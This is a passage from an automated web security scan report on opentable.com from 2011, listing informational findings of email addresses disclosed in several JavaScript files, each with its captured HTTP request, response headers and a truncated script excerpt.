Date: Mon, 03 Oct 2011 14:21:30 GMT

var menuwidth="165px";var menubgcolor="#fbefd5";var disappeardelay=400;var appeardelay=450;var hidemenu_onclick="no";var pageloaded="no";var ie4=document.all;var ns6=document.getElementById&&!document
...[SNIP]...
20.220. http://www.opentable.com/jscripts/imgCalendar_intl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/imgCalendar_intl.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/imgCalendar_intl.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 18882
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

var pInputMonth;var pInputDay;var pInputYear;var today=new Date;var javaDate=today;var year=today.getFullYear();var javaYear=year;var month=today.getMonth();var javaMonth=today.getMonth();var inputDat
...[SNIP]...
20.221. http://www.opentable.com/jscripts/jcarousellite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/jcarousellite.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /jscripts/jcarousellite.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 14322
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:10:00 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

/**
* jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget.
* @requires jQuery v1.2 or above
*
* http://gmarwaha.com/jquery/jcarousellite/
*
* Copyright
...[SNIP]...
llbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext:
...[SNIP]...
20.222. http://www.opentable.com/jscripts/lib/thirdparty/ba-postmessage.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/lib/thirdparty/ba-postmessage.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/lib/thirdparty/ba-postmessage.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; s_cc=true; s_nr=1317651710801-Repeat; s_sq=%5B%5BB%5D%5D; ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; em=0; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3144
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 14:21:29 GMT

(function($){"$:nomunge";var interval_id,last_hash,cache_bust=1,rm_callback,window=this,FALSE=!1,postMessage="postMessage",addEventListener="addEventListener",p_receiveMessage,has_postMessage=window[p
...[SNIP]...
20.223. http://www.opentable.com/jscripts/lib/thirdparty/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/lib/thirdparty/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/lib/thirdparty/prototype.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 100437
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

var Prototype={Version:"1.6.0",Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf("AppleWebKit/")>-1,Gecko:navigator.userAgent.indexOf("Gecko")>-
...[SNIP]...
20.224. http://www.opentable.com/jscripts/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/mbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/mbox.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 22254
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:16 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:44 GMT

var mboxCopyright="Copyright 1996-2010. Adobe Systems Incorporated. All rights reserved";mboxUrlBuilder=function(a,b){this.a=a;this.b=b;this.c=new Array;this.d=function(e){return e};this.f=null};mboxU
...[SNIP]...
20.225. http://www.opentable.com/jscripts/otlibrary.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/otlibrary.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/otlibrary.js?ver=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 25699
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:45 GMT

window.onerror=null;var m_nSearchModuleTTResponse=0;var ControlClientIDS={};var m_sCookieDomain=null;var AdPanelSupressAds=0;var m_cRetryInterval=2E3;var m_bRenderedAdOnPage=false;var cCONST_NOPAID_AD
...[SNIP]...
20.226. http://www.opentable.com/jscripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/s_code.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 34164
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:44 GMT

var s=s_gi(s_account);s.currencyCode="USD";s.trackDownloadLinks=true;s.trackExternalLinks=true;s.trackInlineStats=true;s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,pp
...[SNIP]...
20.227. http://www.opentable.com/jscripts/search/Filters.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/search/Filters.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/search/Filters.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 65153
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:01 GMT

var m_nMaxItemsPerFilterGroup=3;var m_nLocationPopup_NeighborhoodColumnCount=3;var m_nCuisinePopup_CuisineColumnCount=3;var m_oSubmissionTimer=null;var m_oMicroToMacroCuisineLookup=new Hash;var m_nTem
...[SNIP]...
20.228. http://www.opentable.com/jscripts/search/Results.Common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/search/Results.Common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/search/Results.Common.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 32197
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:52 GMT

var m_sDebugMessage="";var m_bWasFirstSuccessfulResultShown=false;var m_hashParsedValues=new Hash;var cCONST_GEO_METRO_REDIRECT_PLACEHOLDER="^METRO_REDIR^";var GridType={ResultsGrid:0,PopGrid:1,NextAv
...[SNIP]...
20.229. http://www.opentable.com/jscripts/search/Results.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/search/Results.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/search/Results.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6817
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:52 GMT

var m_bSetSCRestPopupValue=false;var m_arrDropdownIDsToExcludeFromHidding=["GeoLocationDistance"];function ResultsPage_OnLoad(){ToggleProcessingMessage(false);try{if(UpdateMapImage)Event.observe(windo
...[SNIP]...
20.230. http://www.opentable.com/jscripts/search/SearchBox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/search/SearchBox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/search/SearchBox.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 33207
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:28 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:02 GMT

var Metro={ID:null,Name:null,ShortName:null,Latitude:null,Longitude:null,CountryCode:null,LatSpan:null,LonSpan:null};var GeoLocationMessage={MetroRedirect:1,NotFound:2,HideAll:3,MultiMatch:4};
var OT_
...[SNIP]...
20.231. http://www.opentable.com/jscripts/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/thickbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/thickbox.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; s_cc=true; s_nr=1317651710801-Repeat; s_sq=%5B%5BB%5D%5D; ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; em=0; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 10713
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 14:21:29 GMT

var tb_pathToImage="/info/restaurateurs/img/loadingAnimation.gif";var gBlnOverlayClickNoRemove=false;var tb_Ready=function(){tb_init("a.thickbox, area.thickbox, input.thickbox");imgLoader=new Image;im
...[SNIP]...
20.232. http://www.opentable.com/jscripts/topten.js  previous  next

